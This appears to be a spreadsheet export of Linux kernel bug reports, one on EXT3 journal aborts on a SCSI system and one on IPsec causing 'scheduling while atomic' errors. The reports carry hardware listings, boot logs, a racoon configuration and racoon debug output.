/proc/iomem) 0000-001f : dma1 0020-0021 : pic1 0040-005f : timer 0060-006f : keyboard 0070-0077 : rtc 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 01f0-01f7 : ide0 0378-037a : parport0 03c0-03df : vga+ 03f6-03f6 : ide0 03f8-03ff : serial 04d0-04d1 : pnp 00:0d 0cf8-0cff : PCI conf1 b800-b8ff : 0000:01:00.0 b800-b8ff : BusLogic BT-950 bc00-bc3f : 0000:01:08.0 bc00-bc3f : e100 c400-c41f : 0000:00:1f.3 c800-c81f : 0000:00:1d.0 cc00-cc1f : 0000:00:1d.1 d000-d01f : 0000:00:1d.2 d400-d41f : 0000:00:1d.3 d800-d80f : 0000:00:1f.2 dc00-dc03 : 0000:00:1f.2 e000-e007 : 0000:00:1f.2 e400-e403 : 0000:00:1f.2 e800-e807 : 0000:00:1f.2 ec00-ec07 : 0000:00:02.0 ffa0-ffaf : 0000:00:1f.1 00000000-0009fbff : System RAM 0009fc00-0009ffff : reserved 000a0000-000bffff : Video RAM area 000ca800-000cf7ff : Extension ROM 000f0000-000fffff : System ROM 00100000-3ef2fbff : System RAM 00100000-0028fdc1 : Kernel code 0028fdc2-0032e31f : Kernel data 3ef2fc00-3ef2ffff : ACPI Non-volatile Storage 3ef30000-3ef3ffff : ACPI Tables 3ef40000-3efeffff : ACPI Non-volatile Storage 3eff0000-3effffff : reserved 3f000000-3f0003ff : 0000:00:1f.1 f0000000-f7ffffff : 0000:00:02.0 f8000000-fbffffff : 0000:00:00.0 fe00f000-fe00ffff : 0000:01:00.0 fecf0000-fecf0fff : reserved fed20000-fed9ffff : reserved ff8fe000-ff8fefff : 0000:01:08.0 ff8fe000-ff8fefff : e100 ffa7f400-ffa7f4ff : 0000:00:1f.5 ffa7f400-ffa7f4ff : Intel ICH5 - Controller ffa7f800-ffa7f9ff : 0000:00:1f.5 ffa7f800-ffa7f9ff : Intel ICH5 - AC'97 ffa7fc00-ffa7ffff : 0000:00:1d.7 ffa80000-ffafffff : 0000:00:02.0 [7.5.] PCI information ('lspci -vvv' as root) /sys $ lspci -vvv 00:00.0 Host bridge: Intel Corp. 82865G/PE/P Processor to I/O Controller (rev 02) Subsystem: Intel Corp. 82865G/PE/P Processor to I/O Controller Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Region 0: Memory at f8000000 (32-bit, prefetchable) [size=64M] Capabilities: &lt;available only to root&gt; 00:02.0 VGA compatible controller: Intel Corp. 82865G Integrated Graphics Device (rev 02) (prog-if 00 [VGA]) Subsystem: Intel Corp.: Unknown device 4c43 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 0: Memory at f0000000 (32-bit, prefetchable) [size=128M] Region 1: Memory at ffa80000 (32-bit, non-prefetchable) [size=512K] Region 2: I/O ports at ec00 [size=8] Capabilities: &lt;available only to root&gt; 00:1d.0 USB Controller: Intel Corp. 82801EB USB (rev 02) (prog-if 00 [UHCI]) Subsystem: Intel Corp.: Unknown device 4c43 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 4: I/O ports at c800 [size=32] 00:1d.1 USB Controller: Intel Corp. 82801EB USB (rev 02) (prog-if 00 [UHCI]) Subsystem: Intel Corp.: Unknown device 4c43 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 19 Region 4: I/O ports at cc00 [size=32] 00:1d.2 USB Controller: Intel Corp. 82801EB USB (rev 02) (prog-if 00 [UHCI]) Subsystem: Intel Corp.: Unknown device 4c43 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin C routed to IRQ 18 Region 4: I/O ports at d000 [size=32] 00:1d.3 USB Controller: Intel Corp. 82801EB USB (rev 02) (prog-if 00 [UHCI]) Subsystem: Intel Corp.: Unknown device 4c43 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 4: I/O ports at d400 [size=32] 00:1d.7 USB Controller: Intel Corp. 82801EB USB2 (rev 02) (prog-if 20 [EHCI]) Subsystem: Intel Corp.: Unknown device 4c43 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin D routed to IRQ 23 Region 0: Memory at ffa7fc00 (32-bit, non-prefetchable) [size=1K] Capabilities: &lt;available only to root&gt; 00:1e.0 PCI bridge: Intel Corp. 82801BA/CA/DB/EB PCI Bridge (rev c2) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=32 I/O behind bridge: 0000b000-0000bfff Memory behind bridge: ff800000-ff8fffff Prefetchable memory behind bridge: fff00000-000fffff BridgeCtl: Parity- SERR+ NoISA+ VGA- MAbort- &gt;Reset- FastB2B- 00:1f.0 ISA bridge: Intel Corp. 82801EB LPC Interface Controller (rev 02) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:1f.1 IDE interface: Intel Corp. 82801EB Ultra ATA Storage Controller (rev 02) (prog-if 8a [Master SecP PriP]) Subsystem: Intel Corp.: Unknown device 4c43 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 18 Region 0: I/O ports at &lt;unassigned&gt; Region 1: I/O ports at &lt;unassigned&gt; Region 2: I/O ports at &lt;unassigned&gt; Region 3: I/O ports at &lt;unassigned&gt; Region 4: I/O ports at ffa0 [size=16] Region 5: Memory at 3f000000 (32-bit, non-prefetchable) [disabled] [size=1K] 00:1f.2 IDE interface: Intel Corp. 82801EB Ultra ATA Storage Controller (rev 02) (prog-if 8f [Master SecP SecO PriP PriO]) Subsystem: Intel Corp.: Unknown device 4c43 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 18 Region 0: I/O ports at e800 [size=8] Region 1: I/O ports at e400 [size=4] Region 2: I/O ports at e000 [size=8] Region 3: I/O ports at dc00 [size=4] Region 4: I/O ports at d800 [size=16] 00:1f.3 SMBus: Intel Corp. 82801EB SMBus Controller (rev 02) Subsystem: Intel Corp.: Unknown device 4c43 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin B routed to IRQ 17 Region 4: I/O ports at c400 [size=32] 00:1f.5 Multimedia audio controller: Intel Corp. 82801EB AC'97 Audio Controller (rev 02) Subsystem: Intel Corp.: Unknown device e002 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 17 Region 2: Memory at ffa7f800 (32-bit, non-prefetchable) [size=512] Region 3: Memory at ffa7f400 (32-bit, non-prefetchable) [size=256] Capabilities: &lt;available only to root&gt; 01:00.0 SCSI storage controller: BusLogic Flashpoint LT (rev 02) Subsystem: BusLogic Flashpoint LT Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (2000ns min, 2000ns max), Cache Line Size: 0x10 (64 bytes) Interrupt: pin A routed to IRQ 21 Region 0: I/O ports at b800 [size=256] Region 1: Memory at fe00f000 (32-bit, non-prefetchable) [size=4K] Expansion ROM at fe000000 [disabled] [size=64K] 01:08.0 Ethernet controller: Intel Corp.: Unknown device 1050 (rev 01) Subsystem: Intel Corp.: Unknown device 303a Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (2000ns min, 14000ns max), Cache Line Size: 0x10 (64 bytes) Interrupt: pin A routed to IRQ 20 Region 0: Memory at ff8fe000 (32-bit, non-prefetchable) [size=4K] Region 1: I/O ports at bc00 [size=64] Capabilities: &lt;available only to root&gt; /sys $ [7.6.] SCSI information (from /proc/scsi/scsi) Attached devices: Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: SEAGATE Model: ST336607LW Rev: 0006 Type: Direct-Access ANSI SCSI revision: 03 Host: scsi0 Channel: 00 Id: 02 Lun: 00 Vendor: SEAGATE Model: ST336607LW Rev: 0006 Type: Direct-Access ANSI SCSI revision: 03 Host: scsi0 Channel: 00 Id: 03 Lun: 00 Vendor: SEAGATE Model: ST336607LW Rev: 0006 Type: Direct-Access ANSI SCSI revision: 03 [7.7.] Other information that might be relevant to the problem (please look in /proc and include all information that you think to be relevant): /var/log/kern.log: Feb 26 06:25:24 mercurio kernel: EXT3-fs error (device dm-2): ext3_readdir: bad entry in directory #381585: directory entry across blocks - offset=0, inode=0, rec_len=4132, name_len=63 Feb 26 06:25:24 mercurio kernel: Aborting journal on device dm-2. Feb 26 06:25:24 mercurio kernel: ext3_abort called. Feb 26 06:25:24 mercurio kernel: EXT3-fs abort (device dm-2): ext3_journal_start: Detected aborted journal Feb 26 06:25:24 mercurio kernel: Remounting filesystem read-only [...] Feb 26 15:57:21 mercurio kernel: EXT3-fs error (device dm-2) in start_transaction: Journal has aborted Feb 26 15:57:21 mercurio kernel: EXT3-fs error (device dm-2) in ext3_delete_inode: Journal has aborted [X.] Other notes, patches, fixes, workarounds: No known patch or fix, not enough knowledge or skill, sorry... Have seen various reports by Googling around, from 2.5 something up to 2.6.3.</t>
  </si>
  <si>
    <t>IPSEC triggers "bad: scheduling while atomic!" errors.</t>
  </si>
  <si>
    <t>2.6.6 &amp; 2.6.7, earlier kernels untested.</t>
  </si>
  <si>
    <t>2004-08-03 13:43 UTC</t>
  </si>
  <si>
    <t>Johan Karlberg</t>
  </si>
  <si>
    <t>2004-09-09 23:21 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable and testing. Hardware Environment: K6-2 400, K6 233 Linux version 2.6.7 (root@scooby) (gcc version 3.3.4 (Debian 1:3.3.4-6)) #2 Sun Aug 1 21:13:50 CEST 2004 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 00000000000a0000 (usable) BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000000fffc000 (usable) BIOS-e820: 000000000fffc000 - 000000000ffff000 (ACPI data) BIOS-e820: 000000000ffff000 - 0000000010000000 (ACPI NVS) BIOS-e820: 00000000ffff0000 - 0000000100000000 (reserved) 255MB LOWMEM available. On node 0 totalpages: 65532 DMA zone: 4096 pages, LIFO batch:1 Normal zone: 61436 pages, LIFO batch:14 HighMem zone: 0 pages, LIFO batch:1 DMI 2.0 present. Built 1 zonelists Kernel command line: auto BOOT_IMAGE=Linux ro root=302 acpi=off No local APIC present or hardware disabled Initializing CPU#0 PID hash table entries: 1024 (order 10: 8192 bytes) Detected 400.859 MHz processor. Using tsc for high-res timesource Console: colour VGA+ 80x25 Memory: 256672k/262128k available (1446k kernel code, 4732k reserved, 757k data, 208k init, 0k highmem) Checking if this processor honours the WP bit even in supervisor mode... Ok. Calibrating delay loop... 792.57 BogoMIPS Security Scaffold v1.0.0 initialized Dentry cache hash table entries: 32768 (order: 5, 131072 bytes) Inode-cache hash table entries: 16384 (order: 4, 65536 bytes) Mount-cache hash table entries: 512 (order: 0, 4096 bytes) CPU: After generic identify, caps: 008021bf 808029bf 00000000 00000000 CPU: After vendor identify, caps: 008021bf 808029bf 00000000 00000000 CPU: L1 I Cache: 32K (32 bytes/line), D cache 32K (32 bytes/line) CPU: After all inits, caps: 008021bf 808029bf 00000000 00000002 CPU: AMD-K6(tm) 3D processor stepping 0c Checking 'hlt' instruction... OK. Checking for popad bug... OK. NET: Registered protocol family 16 EISA bus registered PCI: PCI BIOS revision 2.10 entry at 0xf0720, last bus=1 PCI: Using configuration type 1 mtrr: v2.0 (20020519) ACPI: Subsystem revision 20040326 ACPI: Interpreter disabled. Linux Plug and Play Support v0.97 (c) Adam Belay PnPBIOS: Scanning system for PnP BIOS support... PnPBIOS: Found PnP BIOS installation structure at 0xc00fd220 PnPBIOS: PnP BIOS version 1.0, entry 0xf0000:0xd250, dseg 0xf0000 PnPBIOS: Resource structure does not contain an end tag. PnPBIOS: build_devlist: Node number 0x0 is out of sequence following node 0x0. Aborting. PnPBIOS: 1 node reported by PnP BIOS; 1 recorded by driver PCI: Probing PCI hardware PCI: Probing PCI hardware (bus 00) PCI: Using ALI IRQ Router PCI: Using IRQ router ALI [10b9/1533] at 0000:00:07.0 VFS: Disk quotas dquot_6.5.1 Dquot-cache hash table entries: 1024 (order 0, 4096 bytes) devfs: 2004-01-31 Richard Gooch (rgooch@atnf.csiro.au) devfs: boot_options: 0x0 Initializing Cryptographic API Activating ISA DMA hang workarounds. isapnp: Scanning for PnP cards... isapnp: No Plug &amp; Play device found Serial: 8250/16550 driver $Revision: 1.90 $ 54 ports, IRQ sharing enabled RAMDISK driver initialized: 16 RAM disks of 8192K size 1024 blocksize Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx ALI15X3: IDE controller at PCI slot 0000:00:0f.0 ALI15X3: chipset revision 193 ALI15X3: not 100% native mode: will probe irqs later ide0: BM-DMA at 0xd400-0xd407, BIOS settings: hda:DMA, hdb:pio ide1: BM-DMA at 0xd408-0xd40f, BIOS settings: hdc:pio, hdd:pio hda: ST360021A, ATA DISK drive hdb: ST380021A, ATA DISK drive Using anticipatory io scheduler ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 hdc: ST3120023A, ATA DISK drive hdd: ST3120024A, ATA DISK drive ide1 at 0x170-0x177,0x376 on irq 15 hda: max request size: 128KiB hda: 117231408 sectors (60022 MB) w/2048KiB Cache, CHS=65535/16/63, UDMA(33) /dev/ide/host0/bus0/target0/lun0: p1 p2 p3 p4 hdb: max request size: 128KiB hdb: 156301488 sectors (80026 MB) w/2048KiB Cache, CHS=65535/16/63, UDMA(33) /dev/ide/host0/bus0/target1/lun0: p1 hdc: max request size: 128KiB hdc: 234441648 sectors (120034 MB) w/2048KiB Cache, CHS=65535/16/63, UDMA(33) /dev/ide/host0/bus1/target0/lun0: p1 hdd: max request size: 128KiB hdd: 234441648 sectors (120034 MB) w/8192KiB Cache, CHS=65535/16/63, UDMA(33) /dev/ide/host0/bus1/target1/lun0: p1 serio: i8042 AUX port at 0x60,0x64 irq 12 serio: i8042 KBD port at 0x60,0x64 irq 1 input: AT Translated Set 2 keyboard on isa0060/serio0 EISA: Probing bus 0 at eisa0 NET: Registered protocol family 2 IP: routing cache hash table of 2048 buckets, 16Kbytes TCP: Hash tables configured (established 16384 bind 32768) NET: Registered protocol family 8 NET: Registered protocol family 20 kjournald starting. Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. VFS: Mounted root (ext3 filesystem) readonly. Freeing unused kernel memory: 208k freed NET: Registered protocol family 1 Adding 996020k swap on /dev/hda4. Priority:-1 extents:1 EXT3 FS on hda2, internal journal Real Time Clock Driver v1.12 device-mapper: 4.1.0-ioctl (2003-12-10) initialised: dm@uk.sistina.com kjournald starting. Commit interval 5 seconds EXT3 FS on hda1, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS on hda3, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS on hdb1, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS on hdc1, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS on hdd1, internal journal EXT3-fs: mounted filesystem with ordered data mode. Linux agpgart interface v0.100 (c) Dave Jones agpgart: Detected ALi M1541 chipset agpgart: Maximum main memory to use for agp memory: 203M agpgart: AGP aperture is 64M @ 0xe0000000 cpci_hotplug: CompactPCI Hot Plug Core version: 0.2 pci_hotplug: PCI Hot Plug PCI Core version: 0.5 pciehp: acpi_pciehprm:get_device PCI ROOT HID fail=0x1001 shpchp: acpi_shpchprm:get_device PCI ROOT HID fail=0x1001 PCI: Found IRQ 10 for device 0000:00:0d.0 3c59x: Donald Becker and others. www.scyld.com/network/vortex.html 0000:00:0d.0: 3Com PCI 3c905 Boomerang 100baseTx at 0xd800. Vers LK1.1.19 PCI: Setting latency timer of device 0000:00:0d.0 to 64 eth0: Dropping NETIF_F_SG since no checksum feature. usbcore: registered new driver usbfs usbcore: registered new driver hub ohci_hcd: 2004 Feb 02 USB 1.1 'Open' Host Controller (OHCI) Driver (PCI) ohci_hcd: block sizes: ed 64 td 64 USB Universal Host Controller Interface driver v2.2 ttyS0: LSR safety check engaged! ttyS0: LSR safety check engaged! ttyS1: LSR safety check engaged! ttyS1: LSR safety check engaged! NET: Registered protocol family 10 Disabled Privacy Extensions on device c02f0580(lo) IPv6 over IPv4 tunneling driver processor : 0 vendor_id : AuthenticAMD cpu family : 5 model : 8 model name : AMD-K6(tm) 3D processor stepping : 12 cpu MHz : 400.859 cache size : 64 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr mce cx8 pge mmx syscall 3dnow k6_mtrr bogomips : 792.57 Software Environment: options.l2tp.lns: ipcp-accept-local ipcp-accept-remote ms-dns 192.168.0.1 #ms-wins 10.1.96.3 auth crtscts idle 1800 mtu 1400 mru 1400 defaultroute nodetach debug lock proxyarp connect-delay 5000 racoon.conf: # # Simple racoon.conf # # # Please look in /usr/share/doc/racoon/examples for # the example that comes with the source. # # Please read racoon.conf(5) for details, and also # read setkey(8). # # Also read the Linux IPSEC Howto up at # http://www.ipsec-howto.org/t1.html # path pre_shared_key "/etc/racoon/psk.txt"; path certificate "/etc/racoon/certs"; log debug2; listen { isakmp 192.168.0.2; strict_address; } remote anonymous { exchange_mode main; doi ipsec_doi; situation identity_only; generate_policy on; verify_cert off; my_identifier asn1dn; peers_identifier asn1dn; verify_identifier on; certificate_type x509 "scooby_cert.pem" "scooby_key.pem"; proposal { encryption_algorithm 3des; hash_algorithm sha1; authentication_method rsasig; dh_group modp1024; } } sainfo anonymous { lifetime time 28800 sec; encryption_algorithm 3des ; authentication_algorithm hmac_md5; compression_algorithm deflate ; } portion of syslog preceeding the problem, and including the first of the error message. messages and trace seems to be identical and repeating indefinitly.: Aug 3 21:55:43 scooby pppd[3975]: sent [LCP EchoReq id=0x70 magic=0x3e763ee9] Aug 3 21:55:43 scooby pppd[3975]: rcvd [LCP EchoRep id=0x70 magic=0x8da75c9] Aug 3 21:56:13 scooby pppd[3975]: sent [LCP EchoReq id=0x71 magic=0x3e763ee9] Aug 3 21:56:13 scooby pppd[3975]: rcvd [LCP EchoRep id=0x71 magic=0x8da75c9] Aug 3 21:56:41 scooby l2tpd[1194]: check_control: control, cid = 0, Ns = 4, Nr = 59 Aug 3 21:56:43 scooby pppd[3975]: sent [LCP EchoReq id=0x72 magic=0x3e763ee9] Aug 3 21:56:43 scooby pppd[3975]: rcvd [LCP EchoRep id=0x72 magic=0x8da75c9] Aug 3 21:57:13 scooby pppd[3975]: sent [LCP EchoReq id=0x73 magic=0x3e763ee9] Aug 3 21:57:13 scooby pppd[3975]: rcvd [LCP EchoRep id=0x73 magic=0x8da75c9] Aug 3 21:57:41 scooby l2tpd[1194]: check_control: control, cid = 0, Ns = 4, Nr = 60 Aug 3 21:57:43 scooby pppd[3975]: sent [LCP EchoReq id=0x74 magic=0x3e763ee9] Aug 3 21:57:43 scooby pppd[3975]: rcvd [LCP EchoRep id=0x74 magic=0x8da75c9] Aug 3 21:58:13 scooby pppd[3975]: sent [LCP EchoReq id=0x75 magic=0x3e763ee9] Aug 3 21:58:13 scooby pppd[3975]: rcvd [LCP EchoRep id=0x75 magic=0x8da75c9] Aug 3 21:58:41 scooby l2tpd[1194]: check_control: control, cid = 0, Ns = 4, Nr = 61 Aug 3 21:58:43 scooby pppd[3975]: sent [LCP EchoReq id=0x76 magic=0x3e763ee9] Aug 3 21:58:43 scooby pppd[3975]: rcvd [LCP EchoRep id=0x76 magic=0x8da75c9] Aug 3 21:59:13 scooby pppd[3975]: sent [LCP EchoReq id=0x77 magic=0x3e763ee9] Aug 3 21:59:13 scooby racoon: DEBUG: === Aug 3 21:59:13 scooby racoon: DEBUG: 1116 bytes message received from 192.168.0.100[500] to 192.168.0.2[500] Aug 3 21:59:13 scooby racoon: DEBUG: e439faa2 df4fcd2d 6f7069be 243c45c7 08102001 d48272e2 0000045c 7bbec0a2 280a7f91 c7d45818 29e7efa1 f5edb562 25e2d94d 035809d3 531a5dc4 a5788256 1fa9bd30 4caa0e06 4da593f9 b8cfa9f4 571ee579 40682f9c fd676bbf 694c63a1 16e55cb6 64d6d491 1080f6fd 7ac0103f ce9dd9c1 27838b58 4a77ee04 e1ebd209 b386c792 9f5a405c 324ade2f ea9361b5 5e59c63b 7a835a2a 3e43860d 905d6c7e f59bbb9b 3926967b d153ffc2 e8f44a48 60dc16fa f1082e22 2f8f1e84 027a387d 16657978 147f3e76 e3c7cf5e 23265899 d7f7d43b 8f44ca43 7e451d4c 4f7f81fe 26aa518f 7f60b88f 2aecd19a 24fd9724 1a88c259 0497c0a7 bbf50cd5 1608ae47 fcdfe38e eb80c706 271664fc 07e43e47 2efde0d2 231359bf 7a924935 c0022be9 90824d55 fea279bc 14957031 db26a92e bfe71395 59ce5d44 37c13bbb dbec384d 06cb9741 3eed1116 ce582060 48360835 5ff9b961 a1db5978 bbc0649a 62241d36 f53ba9b9 23217d0f 6f4aea50 b4fccec2 da4da175 b75dbd8f f5dd5ba3 700869be a8c49a5d dc7452c6 9952c1d4 7605a19b 940ecd50 d217d398 4673a9af 7e70f403 90c743bc ee2754b2 2a6cc5b4 fd809cb1 ab569fce 14fe1 Aug 3 21:59:13 scooby racoon: DEBUG: compute IV for phase2 Aug 3 21:59:13 scooby racoon: DEBUG: phase1 last IV: Aug 3 21:59:13 scooby racoon: DEBUG: d589b86f 956f2b07 d48272e2 Aug 3 21:59:13 scooby racoon: DEBUG: hash(sha1) Aug 3 21:59:13 scooby racoon: DEBUG: encription(3des) Aug 3 21:59:13 scooby racoon: DEBUG: phase2 IV computed: Aug 3 21:59:13 scooby racoon: DEBUG: c975fe48 1f39bbb6 Aug 3 21:59:13 scooby racoon: DEBUG: === Aug 3 21:59:13 scooby racoon: INFO: respond new phase 2 negotiation: 192.168.0.2[0]&lt;=&gt;192.168.0.100[0] Aug 3 21:59:13 scooby racoon: DEBUG: begin decryption. Aug 3 21:59:13 scooby racoon: DEBUG: encription(3des) Aug 3 21:59:13 scooby racoon: DEBUG: IV was saved for next processing: Aug 3 21:59:13 scooby racoon: DEBUG: fb5332b8 6d9c5cbf Aug 3 21:59:13 scooby racoon: DEBUG: encription(3des) Aug 3 21:59:13 scooby racoon: DEBUG: with key: Aug 3 21:59:13 scooby racoon: DEBUG: e0814bd6 704b9d63 54bf6496 64f8abdb b5e41d57 e08d61d9 Aug 3 21:59:13 scooby racoon: DEBUG: decrypted payload by IV: Aug 3 21:59:13 scooby racoon: DEBUG: fb5332b8 6d9c5cbf Aug 3 21:59:13 scooby racoon: DEBUG: decrypted payload, but not trimed. Aug 3 21:59:13 scooby racoon: DEBUG: 01000018 416fc129 f6e56e35 38696b7f 077c02b3 99fb3621 0a0003f4 00000001 00000001 0200005c 01030402 c072ec18 03000028 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050001 00000028 02030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050002 02000034 02020401 c072ec18 00000028 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050002 02000030 02030401 7fc0da59 00000024 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 02000034 03020401 c072ec18 00000028 01020000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050001 02000030 03030401 7fc0da59 00000024 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 02000034 04020401 c072ec18 00000028 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050002 02000034 04030401 7fc0da59 00000028 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050002 02000034 05020 Aug 3 21:59:13 scooby racoon: DEBUG: padding len=1 Aug 3 21:59:13 scooby racoon: DEBUG: skip to trim padding. Aug 3 21:59:13 scooby racoon: DEBUG: decrypted. Aug 3 21:59:13 scooby pppd[3975]: rcvd [LCP EchoRep id=0x77 magic=0x8da75c9] Aug 3 21:59:13 scooby racoon: DEBUG: e439faa2 df4fcd2d 6f7069be 243c45c7 08102001 d48272e2 0000045c 01000018 416fc129 f6e56e35 38696b7f 077c02b3 99fb3621 0a0003f4 00000001 00000001 0200005c 01030402 c072ec18 03000028 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050001 00000028 02030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050002 02000034 02020401 c072ec18 00000028 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050002 02000030 02030401 7fc0da59 00000024 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 02000034 03020401 c072ec18 00000028 01020000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050001 02000030 03030401 7fc0da59 00000024 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 02000034 04020401 c072ec18 00000028 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050002 02000034 04030401 7fc0da59 00000028 01030000 80010001 00020004 00000 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=8(hash) Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=1(sa) Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=10(nonce) Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=5(id) Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=5(id) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: received IDci2: Aug 3 21:59:13 scooby racoon: DEBUG: 011106a5 c0a80064 Aug 3 21:59:13 scooby racoon: DEBUG: received IDcr2: Aug 3 21:59:13 scooby racoon: DEBUG: 01110000 c0a80002 Aug 3 21:59:13 scooby racoon: DEBUG: HASH(1) validate: Aug 3 21:59:13 scooby racoon: DEBUG: 416fc129 f6e56e35 38696b7f 077c02b3 99fb3621 Aug 3 21:59:13 scooby racoon: DEBUG: HASH with: Aug 3 21:59:13 scooby racoon: DEBUG: d48272e2 